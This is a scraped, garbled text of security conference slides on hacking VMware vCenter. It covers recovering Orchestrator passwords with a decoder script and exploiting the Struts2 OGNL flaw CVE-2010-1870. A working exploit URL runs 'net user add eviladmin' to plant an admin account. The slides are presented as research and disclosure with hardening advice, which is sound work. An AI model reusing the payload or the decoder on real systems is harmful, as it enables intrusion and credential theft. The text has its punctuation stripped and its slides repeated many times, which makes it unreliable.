Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-